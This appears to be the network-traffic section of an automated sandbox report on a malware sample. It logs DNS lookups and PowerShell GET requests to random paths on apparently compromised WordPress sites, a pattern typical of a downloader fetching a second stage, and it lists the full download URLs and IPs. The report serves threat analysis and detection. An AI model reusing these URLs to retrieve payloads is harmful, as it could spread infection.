Nov 7, 2024 18:29:28.780222893 CET	192.168.2.22	8.8.8.8	0xc396	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.805823088 CET	192.168.2.22	8.8.8.8	0xa1c9	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:29.246788979 CET	192.168.2.22	8.8.8.8	0xa1c9	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:29.922857046 CET	192.168.2.22	8.8.8.8	0xa232	Standard query (0)	trasix.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:31.748282909 CET	192.168.2.22	8.8.8.8	0x4c75	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:32.016379118 CET	192.168.2.22	8.8.8.8	0x4c75	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:32.100451946 CET	192.168.2.22	8.8.8.8	0x869f	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:32.371484041 CET	192.168.2.22	8.8.8.8	0x869f	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:33.688838005 CET	192.168.2.22	8.8.8.8	0x530a	Standard query (0)	actividades.laforetlanguages.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:34.067126036 CET	192.168.2.22	8.8.8.8	0xde80	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:34.729985952 CET	192.168.2.22	8.8.8.8	0x712d	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:34.941843033 CET	192.168.2.22	8.8.8.8	0x712d	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:35.152707100 CET	192.168.2.22	8.8.8.8	0x712d	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:35.380004883 CET	192.168.2.22	8.8.8.8	0x712d	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:35.790607929 CET	192.168.2.22	8.8.8.8	0x712d	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:38.328353882 CET	192.168.2.22	8.8.8.8	0xcef8	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:38.338058949 CET	192.168.2.22	8.8.8.8	0xc819	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:39.979077101 CET	192.168.2.22	8.8.8.8	0xa6e2	Standard query (0)	parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:41.703156948 CET	192.168.2.22	8.8.8.8	0x42b4	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:41.737442970 CET	192.168.2.22	8.8.8.8	0x42b4	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:45.808527946 CET	192.168.2.22	8.8.8.8	0x24c9	Standard query (0)	bruckevn.site	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:48.136537075 CET	192.168.2.22	8.8.8.8	0x3d37	Standard query (0)	pardiskood.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:49.209939957 CET	192.168.2.22	8.8.8.8	0x551f	Standard query (0)	daujimaharajmandir.org	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:50.070765018 CET	192.168.2.22	8.8.8.8	0x657d	Standard query (0)	datasits.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:50.104423046 CET	192.168.2.22	8.8.8.8	0xfb90	Standard query (0)	anugerahmasinternasional.co.id	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:51.098553896 CET	192.168.2.22	8.8.8.8	0xa5bf	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:52.777345896 CET	192.168.2.22	8.8.8.8	0x972f	Standard query (0)	atmedic.cl	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:52.995913982 CET	192.168.2.22	8.8.8.8	0x972f	Standard query (0)	atmedic.cl	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:53.215004921 CET	192.168.2.22	8.8.8.8	0x972f	Standard query (0)	atmedic.cl	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:53.433043003 CET	192.168.2.22	8.8.8.8	0x972f	Standard query (0)	atmedic.cl	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:53.645944118 CET	192.168.2.22	8.8.8.8	0x972f	Standard query (0)	atmedic.cl	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:56.191560030 CET	192.168.2.22	8.8.8.8	0x4563	Standard query (0)	anwaralbasateen.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:56.337716103 CET	192.168.2.22	8.8.8.8	0x4563	Standard query (0)	anwaralbasateen.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:58.751494884 CET	192.168.2.22	8.8.8.8	0xefa	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:08.136657953 CET	192.168.2.22	8.8.8.8	0x4a42	Standard query (0)	bruckevn.site	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:08.172435999 CET	192.168.2.22	8.8.8.8	0x4a42	Standard query (0)	bruckevn.site	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:10.503354073 CET	192.168.2.22	8.8.8.8	0xf4d0	Standard query (0)	pardiskood.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:11.568897963 CET	192.168.2.22	8.8.8.8	0x38be	Standard query (0)	daujimaharajmandir.org	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:12.485466957 CET	192.168.2.22	8.8.8.8	0x1e1	Standard query (0)	datasits.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2024 18:29:04.839075089 CET	8.8.8.8	192.168.2.22	0x88bf	No error (0)	actividades.laforetlanguages.com		217.160.0.236	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:06.198122025 CET	8.8.8.8	192.168.2.22	0xa543	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:06.232584953 CET	8.8.8.8	192.168.2.22	0x998d	No error (0)	trasix.com		20.23.238.122	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:08.377962112 CET	8.8.8.8	192.168.2.22	0xde1e	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:08.377962112 CET	8.8.8.8	192.168.2.22	0xde1e	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		77.37.50.35	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:08.433595896 CET	8.8.8.8	192.168.2.22	0x2332	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:08.433595896 CET	8.8.8.8	192.168.2.22	0x2332	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		147.79.119.141	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:10.018379927 CET	8.8.8.8	192.168.2.22	0xbc81	No error (0)	parkinsons.co.in		147.79.119.239	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:11.708785057 CET	8.8.8.8	192.168.2.22	0xc2e6	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:27.133934021 CET	8.8.8.8	192.168.2.22	0x91d8	No error (0)	actividades.laforetlanguages.com		217.160.0.236	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.382675886 CET	8.8.8.8	192.168.2.22	0xa1c9	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.595443964 CET	8.8.8.8	192.168.2.22	0xa1c9	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.780065060 CET	8.8.8.8	192.168.2.22	0xc396	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.787233114 CET	8.8.8.8	192.168.2.22	0xc396	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.805258989 CET	8.8.8.8	192.168.2.22	0xa1c9	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:29.015408993 CET	8.8.8.8	192.168.2.22	0xa1c9	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:29.458070040 CET	8.8.8.8	192.168.2.22	0xa1c9	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:29.930105925 CET	8.8.8.8	192.168.2.22	0xa232	No error (0)	trasix.com		20.23.238.122	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:32.016133070 CET	8.8.8.8	192.168.2.22	0x4c75	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:32.016133070 CET	8.8.8.8	192.168.2.22	0x4c75	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		147.79.116.130	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:32.023503065 CET	8.8.8.8	192.168.2.22	0x4c75	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:32.023503065 CET	8.8.8.8	192.168.2.22	0x4c75	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		147.79.119.141	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:32.153675079 CET	8.8.8.8	192.168.2.22	0x869f	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:32.153675079 CET	8.8.8.8	192.168.2.22	0x869f	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		77.37.50.26	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:32.405009031 CET	8.8.8.8	192.168.2.22	0x869f	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:32.405009031 CET	8.8.8.8	192.168.2.22	0x869f	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		77.37.50.35	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:33.695925951 CET	8.8.8.8	192.168.2.22	0x530a	No error (0)	actividades.laforetlanguages.com		217.160.0.236	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:34.074378967 CET	8.8.8.8	192.168.2.22	0xde80	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:34.939785957 CET	8.8.8.8	192.168.2.22	0x712d	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:35.151832104 CET	8.8.8.8	192.168.2.22	0x712d	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:35.362596989 CET	8.8.8.8	192.168.2.22	0x712d	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:35.790424109 CET	8.8.8.8	192.168.2.22	0x712d	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:36.000390053 CET	8.8.8.8	192.168.2.22	0x712d	Name error (3)	sbcopylive.com.br	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:38.335644007 CET	8.8.8.8	192.168.2.22	0xcef8	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:38.335644007 CET	8.8.8.8	192.168.2.22	0xcef8	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		147.79.116.130	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:38.345038891 CET	8.8.8.8	192.168.2.22	0xc819	No error (0)	www.parkinsons.co.in	www.parkinsons.co.in.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 18:29:38.345038891 CET	8.8.8.8	192.168.2.22	0xc819	No error (0)	www.parkinsons.co.in.cdn.hstgr.net		77.37.50.35	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:40.000323057 CET	8.8.8.8	192.168.2.22	0xa6e2	No error (0)	parkinsons.co.in		147.79.119.239	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:41.736790895 CET	8.8.8.8	192.168.2.22	0x42b4	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:41.744425058 CET	8.8.8.8	192.168.2.22	0x42b4	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:45.829363108 CET	8.8.8.8	192.168.2.22	0x24c9	Name error (3)	bruckevn.site	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:48.149023056 CET	8.8.8.8	192.168.2.22	0x3d37	No error (0)	pardiskood.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:48.149023056 CET	8.8.8.8	192.168.2.22	0x3d37	No error (0)	pardiskood.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:49.218424082 CET	8.8.8.8	192.168.2.22	0x551f	No error (0)	daujimaharajmandir.org		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:49.218424082 CET	8.8.8.8	192.168.2.22	0x551f	No error (0)	daujimaharajmandir.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:50.082551956 CET	8.8.8.8	192.168.2.22	0x657d	No error (0)	datasits.com		63.250.43.10	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:50.082551956 CET	8.8.8.8	192.168.2.22	0x657d	No error (0)	datasits.com		63.250.43.9	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:50.115724087 CET	8.8.8.8	192.168.2.22	0xfb90	No error (0)	anugerahmasinternasional.co.id		104.21.3.222	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:50.115724087 CET	8.8.8.8	192.168.2.22	0xfb90	No error (0)	anugerahmasinternasional.co.id		172.67.153.159	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:51.106733084 CET	8.8.8.8	192.168.2.22	0xa5bf	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:52.995450020 CET	8.8.8.8	192.168.2.22	0x972f	Server failure (2)	atmedic.cl	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:53.213871002 CET	8.8.8.8	192.168.2.22	0x972f	Server failure (2)	atmedic.cl	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:53.432868004 CET	8.8.8.8	192.168.2.22	0x972f	Server failure (2)	atmedic.cl	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:53.645711899 CET	8.8.8.8	192.168.2.22	0x972f	Server failure (2)	atmedic.cl	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:53.872998953 CET	8.8.8.8	192.168.2.22	0x972f	Server failure (2)	atmedic.cl	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:56.337310076 CET	8.8.8.8	192.168.2.22	0x4563	No error (0)	anwaralbasateen.com		207.174.214.153	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:56.344647884 CET	8.8.8.8	192.168.2.22	0x4563	No error (0)	anwaralbasateen.com		207.174.214.153	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:58.761651993 CET	8.8.8.8	192.168.2.22	0xefa	No error (0)	biz.merlin.ua		195.177.124.30	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:08.172323942 CET	8.8.8.8	192.168.2.22	0x4a42	Name error (3)	bruckevn.site	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:08.179842949 CET	8.8.8.8	192.168.2.22	0x4a42	Name error (3)	bruckevn.site	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:10.514089108 CET	8.8.8.8	192.168.2.22	0xf4d0	No error (0)	pardiskood.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:10.514089108 CET	8.8.8.8	192.168.2.22	0xf4d0	No error (0)	pardiskood.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:11.588120937 CET	8.8.8.8	192.168.2.22	0x38be	No error (0)	daujimaharajmandir.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:11.588120937 CET	8.8.8.8	192.168.2.22	0x38be	No error (0)	daujimaharajmandir.org		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:12.492995024 CET	8.8.8.8	192.168.2.22	0x1e1	No error (0)	datasits.com		63.250.43.9	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:30:12.492995024 CET	8.8.8.8	192.168.2.22	0x1e1	No error (0)	datasits.com		63.250.43.10	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

trasix.com

www.parkinsons.co.in

pardiskood.com

daujimaharajmandir.org

anugerahmasinternasional.co.id

anwaralbasateen.com

datasits.com

actividades.laforetlanguages.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	217.160.0.236	80	3464	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 18:29:04.854330063 CET	195	OUT	GET /wp-admin/BlkdOKDXL/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: actividades.laforetlanguages.com Connection: Keep-Alive
Nov 7, 2024 18:29:05.743300915 CET	215	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Thu, 07 Nov 2024 17:29:05 GMT Server: Apache Data Raw: 66 0d 0a 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 0a 0d 0a Data Ascii: fAccess denied.
Nov 7, 2024 18:29:05.750052929 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49168	217.160.0.236	80	3688	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 18:29:27.148351908 CET	195	OUT	GET /wp-admin/BlkdOKDXL/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: actividades.laforetlanguages.com Connection: Keep-Alive
Nov 7, 2024 18:29:28.069406033 CET	215	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Thu, 07 Nov 2024 17:29:27 GMT Server: Apache Data Raw: 66 0d 0a 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 0a 0d 0a Data Ascii: fAccess denied.
Nov 7, 2024 18:29:28.072619915 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49172	217.160.0.236	80	3868	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 18:29:33.723911047 CET	195	OUT	GET /wp-admin/BlkdOKDXL/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: actividades.laforetlanguages.com Connection: Keep-Alive
Nov 7, 2024 18:29:34.620887995 CET	215	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Thu, 07 Nov 2024 17:29:34 GMT Server: Apache Data Raw: 66 0d 0a 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 0a 0d 0a Data Ascii: fAccess denied.
Nov 7, 2024 18:29:34.624624968 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	20.23.238.122	443	3464	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:07 UTC	177	OUT	GET /wp-admin/y5Aa1jt0Sp2Qk/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: trasix.com Connection: Keep-Alive
2024-11-07 17:29:08 UTC	417	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 17:29:07 GMT Server: Apache X-Powered-By: PHP/7.4.7 cf-edge-cache: cache,platform=wordpress Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://trasix.com/wp-json/>; rel="https://api.w.org/" X-Frame-Options: SAMEORIGIN Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-07 17:29:08 UTC	6	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2024-11-07 17:29:08 UTC	8192	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 70 6b 67 2e 63 6f 6d 2f 73 77 69 70 65 72 2f 73 77 69 70 65 72 2d 62 75 6e 64 6c 65 2e 6d 69 6e 2e 63 73 Data Ascii: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.cs
2024-11-07 17:29:08 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-07 17:29:08 UTC	6	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2024-11-07 17:29:08 UTC	8192	IN	Data Raw: 22 3e 4d 6f 64 75 6c 65 73 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 39 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 39 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 73 69 78 2e 63 6f 6d 2f 6d 6f 64 75 6c 65 73 2f 6c 69 6e 65 2d 70 6c 61 6e 6e 69 6e 67 2f 22 3e 4c 69 6e 65 20 70 6c 61 6e 6e 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 37 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 Data Ascii: ">Modules</a><ul class="sub-menu"><li id="menu-item-59" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-59"><a href="https://trasix.com/modules/line-planning/">Line planning</a></li><li id="menu-item-57" class="menu-item menu-ite
2024-11-07 17:29:08 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-07 17:29:08 UTC	6	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2024-11-07 17:29:08 UTC	8192	IN	Data Raw: 32 30 4c 32 30 20 31 32 4c 31 32 20 34 5a 22 20 66 69 6c 6c 3d 22 23 46 30 46 30 46 30 22 2f 3e 20 3c 2f 73 76 67 3e 20 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 74 6f 70 5f 5f 69 6d 67 2d 65 72 72 6f 72 22 3e 20 3c 6e 6f 73 63 72 69 70 74 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 73 69 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 72 61 73 69 78 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 61 7a 79 6c 6f 61 64 22 20 73 72 63 3d 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 25 32 30 78 6d 6c 6e 73 3d 25 32 32 Data Ascii: 20L20 12L12 4Z" fill="#F0F0F0"/> </svg> </span></a></div><div class="main-top__img-error"> <noscript><img src="https://trasix.com/wp-content/themes/trasix/images/error.png" alt=""></noscript><img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22
2024-11-07 17:29:08 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-07 17:29:08 UTC	5	IN	Data Raw: 38 34 38 0d 0a Data Ascii: 848

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	77.37.50.35	443	3464	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:09 UTC	180	OUT	GET /abc/Y6Y0fTbUEg6/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: www.parkinsons.co.in Connection: Keep-Alive
2024-11-07 17:29:09 UTC	620	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Thu, 07 Nov 2024 17:29:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close x-powered-by: PHP/7.4.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-redirect-by: WordPress location: https://parkinsons.co.in/abc/Y6Y0fTbUEg6/ x-litespeed-cache: hit platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 091158af25eaee4c58e143f79ae2ab6a-int-edge3 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.466

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49170	20.23.238.122	443	3688	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:29:30 UTC	177	OUT	GET /wp-admin/y5Aa1jt0Sp2Qk/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: trasix.com Connection: Keep-Alive
2024-11-07 17:29:31 UTC	417	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 17:29:30 GMT Server: Apache X-Powered-By: PHP/7.4.7 cf-edge-cache: cache,platform=wordpress Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://trasix.com/wp-json/>; rel="https://api.w.org/" X-Frame-Options: SAMEORIGIN Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
